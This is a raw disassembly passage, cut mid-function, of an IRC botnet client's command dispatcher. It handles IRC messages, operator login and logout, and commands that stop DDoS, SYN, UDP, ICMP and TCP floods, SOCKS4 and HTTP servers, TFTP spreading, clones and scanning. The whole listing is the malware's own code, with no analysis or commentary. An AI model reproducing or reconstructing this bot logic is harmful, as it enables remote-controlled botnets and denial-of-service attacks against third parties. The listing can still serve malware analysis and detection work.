jz short loc_407C38
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407C3C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C1A
loc_407C38: ; CODE XREF: sub_4078FA+32A�j
xor eax, eax
jmp short loc_407C41
; ---------------------------------------------------------------------------
loc_407C3C: ; CODE XREF: sub_4078FA+326�j
; sub_4078FA+334�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407C41: ; CODE XREF: sub_4078FA+340�j
test eax, eax
jnz short loc_407C89
and [edi], al
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
add esp, 20h
loc_407C89: ; CODE XREF: sub_4078FA+2F3�j
; sub_4078FA+312�j ...
add edi, 80h
dec ebx
jnz loc_407BEA
mov esi, [ebp+var_98]
mov eax, [ebp+arg_10]
loc_407C9F: ; CODE XREF: sub_4078FA+3C1�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407CC1
test cl, cl
jz short loc_407CBD
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407CC1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C9F
loc_407CBD: ; CODE XREF: sub_4078FA+3AF�j
xor eax, eax
jmp short loc_407CC6
; ---------------------------------------------------------------------------
loc_407CC1: ; CODE XREF: sub_4078FA+3AB�j
; sub_4078FA+3B9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407CC6: ; CODE XREF: sub_4078FA+3C5�j
test eax, eax
jnz loc_407B7B
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_407AC9
; ---------------------------------------------------------------------------
loc_407CD9: ; CODE XREF: sub_4078FA+2E4�j
mov edi, [ebp+var_A0]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407EB9
mov eax, [ebp+var_9C]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_407D0C: ; CODE XREF: sub_4078FA+4A3�j
lea eax, [ebp+var_C04]
mov esi, ebx
loc_407D14: ; CODE XREF: sub_4078FA+436�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_407D36
test cl, cl
jz short loc_407D32
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_407D36
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407D14
loc_407D32: ; CODE XREF: sub_4078FA+424�j
xor eax, eax
jmp short loc_407D3B
; ---------------------------------------------------------------------------
loc_407D36: ; CODE XREF: sub_4078FA+420�j
; sub_4078FA+42E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407D3B: ; CODE XREF: sub_4078FA+43A�j
test eax, eax
jnz short loc_407D94
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_407D94
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_407D64: ; CODE XREF: sub_4078FA+472�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_407D64
mov eax, edi
mov esi, edi
loc_407D72: ; CODE XREF: sub_4078FA+47D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407D72
sub eax, esi
dec ecx
loc_407D7C: ; CODE XREF: sub_4078FA+488�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_407D7C
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_407D94: ; CODE XREF: sub_4078FA+443�j
; sub_4078FA+459�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_407D0C
cmp [ebp+arg_0], 0
jz loc_407B7B
mov esi, [ebp+arg_10]
lea eax, [ebp+var_E0]
loc_407DB6: ; CODE XREF: sub_4078FA+4D8�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407DD8
test cl, cl
jz short loc_407DD4
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407DD8
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407DB6
loc_407DD4: ; CODE XREF: sub_4078FA+4C6�j
xor eax, eax
jmp short loc_407DDD
; ---------------------------------------------------------------------------
loc_407DD8: ; CODE XREF: sub_4078FA+4C2�j
; sub_4078FA+4D0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407DDD: ; CODE XREF: sub_4078FA+4DC�j
test eax, eax
jnz short loc_407DF6
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_407DE9: ; CODE XREF: sub_4078FA+245�j
call sub_412C40
add esp, 0Ch
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407DF6: ; CODE XREF: sub_4078FA+4E5�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_407DFB: ; CODE XREF: sub_4078FA+543�j
cmp byte ptr [edx], 0
jz short loc_407E33
lea eax, [ebp+var_C04]
mov esi, edx
loc_407E08: ; CODE XREF: sub_4078FA+52A�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407E2A
test cl, cl
jz short loc_407E26
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407E2A
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407E08
loc_407E26: ; CODE XREF: sub_4078FA+518�j
xor eax, eax
jmp short loc_407E2F
; ---------------------------------------------------------------------------
loc_407E2A: ; CODE XREF: sub_4078FA+514�j
; sub_4078FA+522�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407E2F: ; CODE XREF: sub_4078FA+52E�j
test eax, eax
jz short loc_407E44
loc_407E33: ; CODE XREF: sub_4078FA+504�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_407DFB
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: sub_4078FA+537�j
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_407B7B
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_407E64: ; CODE XREF: sub_4078FA+56F�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_407E64
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_407E72: ; CODE XREF: sub_4078FA+57D�j
mov al, [edx]
inc edx
test al, al
jnz short loc_407E72
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_407B7B
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_2 ; ":%s%s"
push edi
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_410]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407EB9: ; CODE XREF: sub_4078FA+3F1�j
mov edi, [ebp+var_A0]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_407EE3
mov edi, [ebp+var_A0]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407F33
loc_407EE3: ; CODE XREF: sub_4078FA+5D3�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_407EEB: ; CODE XREF: sub_4078FA+637�j
cmp byte ptr [esi], 0
jz short loc_407F21
mov edi, [ebp+var_A4]
loc_407EF6: ; CODE XREF: sub_4078FA+618�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_407F18
test cl, cl
jz short loc_407F14
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_407F18
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_407EF6
loc_407F14: ; CODE XREF: sub_4078FA+606�j
xor ecx, ecx
jmp short loc_407F1D
; ---------------------------------------------------------------------------
loc_407F18: ; CODE XREF: sub_4078FA+602�j
; sub_4078FA+610�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_407F1D: ; CODE XREF: sub_4078FA+61C�j
test ecx, ecx
jz short loc_407F76
loc_407F21: ; CODE XREF: sub_4078FA+5F4�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_407EEB
loc_407F33: ; CODE XREF: sub_4078FA+5E7�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407FF7
mov esi, [ebp+var_94]
mov eax, [ebp+arg_8]
loc_407F54: ; CODE XREF: sub_4078FA+676�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407FD5
test cl, cl
jz short loc_407F72
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407FD5
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407F54
loc_407F72: ; CODE XREF: sub_4078FA+664�j
xor eax, eax
jmp short loc_407FDA
; ---------------------------------------------------------------------------
loc_407F76: ; CODE XREF: sub_4078FA+625�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
mov edi, [ebp+var_A0]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
lea eax, [ebp+var_2E0]
push eax
mov eax, [ebp+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_407FD5: ; CODE XREF: sub_4078FA+660�j
; sub_4078FA+66E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407FDA: ; CODE XREF: sub_4078FA+67A�j
test eax, eax
jnz short loc_407FE7
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_407FE7: ; CODE XREF: sub_4078FA+6E2�j
push [ebp+var_94]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_407FF7: ; CODE XREF: sub_4078FA+64B�j
mov edi, [ebp+var_A0]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_408047
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_408047
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40CFE2
cmp dword_42AE50, ebx
jz loc_40CFE2
loc_408047: ; CODE XREF: sub_4078FA+716�j
; sub_4078FA+727�j
mov edi, [ebp+var_A0]
mov ebx, [ebp+var_1C]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov eax, [ebp+var_98]
inc [ebp+var_94]
mov [ebp+var_1C], 4
mov [ebp+var_9C], eax
loc_40808D: ; CODE XREF: sub_4078FA+910�j
; sub_4078FA+94F�j ...
mov ebx, [ebp+var_1C]
shl ebx, 2
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42AE5C
cmp [ecx], al
mov [ebp+var_A8], edx
jnz loc_407B7B
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
push 2
mov edi, edx
mov esi, offset dword_4263E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
cmp [ebp+var_20], eax
jnz short loc_4080F9
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
loc_4080F9: ; CODE XREF: sub_4078FA+7E5�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40CFE2
cmp dword_42B280, eax
mov [ebp+var_10], eax
jle loc_408417
mov [ebp+var_8], offset dword_479030
loc_40811A: ; CODE XREF: sub_4078FA+99A�j
mov edi, [ebp+var_8]
mov esi, edx
loc_40811F: ; CODE XREF: sub_4078FA+849�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_408278
test al, al
jz short loc_408145
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_408278
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_40811F
loc_408145: ; CODE XREF: sub_4078FA+833�j
xor eax, eax
jmp loc_40827D
; ---------------------------------------------------------------------------
loc_40814C: ; CODE XREF: sub_4078FA+75F�j
; sub_4078FA+774�j
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_408164
mov [ebp+var_4], 1
loc_408164: ; CODE XREF: sub_4078FA+861�j
cmp [ebp+var_9C], 0
jz loc_407B7B
push offset dword_4263E4
push [ebp+var_9C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40818D
cmp [ebp+var_4], 0
jz short loc_408199
loc_40818D: ; CODE XREF: sub_4078FA+88B�j
lea eax, [ebp+var_E0]
mov [ebp+var_9C], eax
loc_408199: ; CODE XREF: sub_4078FA+891�j
cmp [ebp+var_98], 0
jz loc_407B7B
inc [ebp+var_98]
jz short loc_4081E8
cmp [ebp+arg_10], 0
jz short loc_4081E8
lea eax, [ebp+var_3AC]
lea edx, [eax+1]
loc_4081BD: ; CODE XREF: sub_4078FA+8C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4081BD
sub eax, edx
push eax
push [ebp+var_98]
lea eax, [ebp+var_3AC]
push eax
call sub_414380
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_1C], ebx
loc_4081E8: ; CODE XREF: sub_4078FA+8B2�j
; sub_4078FA+8B8�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A4]
test edx, edx
jz loc_407B7B
push 0Ah
mov edi, edx
mov esi, offset dword_4263D8
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40808D
mov esi, [ebp+var_9C]
mov bl, [esi]
cmp bl, 23h
jz short loc_40823B
mov ecx, dword_479BBC
mov ecx, off_42AF40[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_40823B
push ecx
push esi
push offset dword_4263BC
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_40823B: ; CODE XREF: sub_4078FA+921�j
; sub_4078FA+933�j
mov edi, edx
push 6
mov esi, offset dword_4263B4
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40808D
mov eax, [ebp+eax+var_A0]
test eax, eax
jz loc_40808D
cmp bl, 23h
jz loc_40808D
push eax
push [ebp+var_9C]
push offset dword_42639C
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_408278: ; CODE XREF: sub_4078FA+82B�j
; sub_4078FA+83D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40827D: ; CODE XREF: sub_4078FA+84D�j
test eax, eax
jz short loc_40829F
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_8], 0B8h
cmp eax, dword_42B280
jl loc_40811A
jmp loc_408417
; ---------------------------------------------------------------------------
loc_40829F: ; CODE XREF: sub_4078FA+985�j
push offset asc_4246B4 ; " :"
push [ebp+arg_0]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
mov esi, [ebp+var_10]
mov cl, byte_42AE5C
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42AE5C
mov [eax+3], cl
push 9Fh
lea ecx, dword_479048[esi]
push ecx
add eax, 4
push eax
call sub_412C40
lea eax, dword_479030[esi]
lea edi, [ebp+ebx+var_64]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_AC], eax
mov esi, edi
loc_408302: ; CODE XREF: sub_4078FA+AAF�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_1 ; "$%d-"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_40836E
cmp dword ptr [esi], 0
jz short loc_408373
mov eax, [ebp+var_AC]
lea edx, [eax+1]
loc_40833A: ; CODE XREF: sub_4078FA+A45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40833A
sub eax, edx
add [ebp+var_14], eax
jz short loc_40839F
push dword ptr [esi-4]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40839F
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
jmp short loc_40839F
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_4078FA+A30�j
cmp dword ptr [esi], 0
jnz short loc_40839F
loc_408373: ; CODE XREF: sub_4078FA+A35�j
push 2
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_412C40
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 18h
loc_40839F: ; CODE XREF: sub_4078FA+A4C�j
; sub_4078FA+A5D�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_408302
mov [ebp+var_10], 10h
mov esi, edi
loc_4083B8: ; CODE XREF: sub_4078FA+B0B�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_4083FB
mov eax, [esi]
test eax, eax
jz short loc_4083FB
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
loc_4083FB: ; CODE XREF: sub_4078FA+AE6�j
; sub_4078FA+AEC�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_4083B8
mov edx, [ebp+var_A8]
mov [ebp+var_AC], 1
loc_408417: ; CODE XREF: sub_4078FA+813�j
; sub_4078FA+9A0�j
mov al, byte_42AE5C
cmp [edx], al
jz short loc_40842D
cmp [ebp+var_AC], 0
jz loc_408609
loc_40842D: ; CODE XREF: sub_4078FA+B24�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40556E
lea eax, [ebp+var_E0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40556E
push [ebp+var_9C]
push offset aChan ; "$chan"
push edi
call sub_40556E
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_40556E
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40556E
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_413920
add esp, 14h
jmp loc_40858D
; ---------------------------------------------------------------------------
loc_4084A4: ; CODE XREF: sub_4078FA+C95�j
push esi
push [ebp+arg_0]
call sub_413920
mov [ebp+var_A8], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_B8]
push offset asc_42635C ; ")"
push eax
call sub_413859
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_4084EB
cmp [ebp+var_B8], 39h
jle short loc_408501
loc_4084EB: ; CODE XREF: sub_4078FA+BE6�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_412C40
add esp, 0Ch
loc_408501: ; CODE XREF: sub_4078FA+BEF�j
lea eax, [ebp+var_B8]
push eax
call sub_412F42
test eax, eax
pop ecx
jle short loc_408524
lea eax, [ebp+var_B8]
push eax
call sub_412F42
pop ecx
mov [ebp+var_24], al
jmp short loc_408535
; ---------------------------------------------------------------------------
loc_408524: ; CODE XREF: sub_4078FA+C16�j
call sub_412D71
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_408535: ; CODE XREF: sub_4078FA+C28�j
and [ebp+var_23], 0
lea eax, [ebp+var_B8]
lea edx, [eax+1]
loc_408542: ; CODE XREF: sub_4078FA+C4D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408542
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_B8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_A8]
stosd
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
push esi
push [ebp+arg_0]
call sub_413920
add esp, 20h
loc_40858D: ; CODE XREF: sub_4078FA+BA5�j
test eax, eax
jnz loc_4084A4
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 20h
mov [ebp+var_A4], eax
inc edi
loc_4085DC: ; CODE XREF: sub_4078FA+CF7�j
push esi
push 0
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4085DC
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
test ecx, ecx
jz loc_407B7B
add ecx, 3
mov [eax], ecx
loc_408609: ; CODE XREF: sub_4078FA+B2D�j
mov eax, [ebp+ebx+var_A4]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_20], eax
jz loc_40CF95
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF95
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C16A
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C16A
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408753
push [ebp+ebx+var_A0]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408753: ; CODE XREF: sub_4078FA+E3F�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40877B
push [ebp+ebx+var_A0]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40877B: ; CODE XREF: sub_4078FA+E67�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087A3
push [ebp+ebx+var_A0]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087A3: ; CODE XREF: sub_4078FA+E8F�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087CB
push [ebp+ebx+var_A0]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087CB: ; CODE XREF: sub_4078FA+EB7�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087F3
push [ebp+ebx+var_A0]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087F3: ; CODE XREF: sub_4078FA+EDF�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40881B
push [ebp+ebx+var_A0]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40881B: ; CODE XREF: sub_4078FA+F07�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408843
push [ebp+ebx+var_A0]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn ; "[SYN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408843: ; CODE XREF: sub_4078FA+F2F�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40886B
push [ebp+ebx+var_A0]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40886B: ; CODE XREF: sub_4078FA+F57�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408893
push [ebp+ebx+var_A0]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408893: ; CODE XREF: sub_4078FA+F7F�j
push 9
mov edi, eax
mov esi, offset aIcmpstop ; "icmpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088BB
push [ebp+ebx+var_A0]
push 0Eh
push offset aIcmpFlood ; "ICMP flood"
loc_4088B1: ; CODE XREF: sub_4078FA+FDF�j
push offset aIcmp_0 ; "[ICMP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4088BB: ; CODE XREF: sub_4078FA+FA7�j
push 8
mov edi, eax
mov esi, offset aTcpstop ; "tcpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088DB
push [ebp+ebx+var_A0]
push 0Dh
push offset aTcpFlood ; "TCP flood"
jmp short loc_4088B1
; ---------------------------------------------------------------------------
loc_4088DB: ; CODE XREF: sub_4078FA+FCF�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408903
push [ebp+ebx+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408903: ; CODE XREF: sub_4078FA+FEF�j
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408953
push [ebp+ebx+var_A0]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408953: ; CODE XREF: sub_4078FA+103F�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40897B
push [ebp+ebx+var_A0]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40897B: ; CODE XREF: sub_4078FA+1067�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4089A3
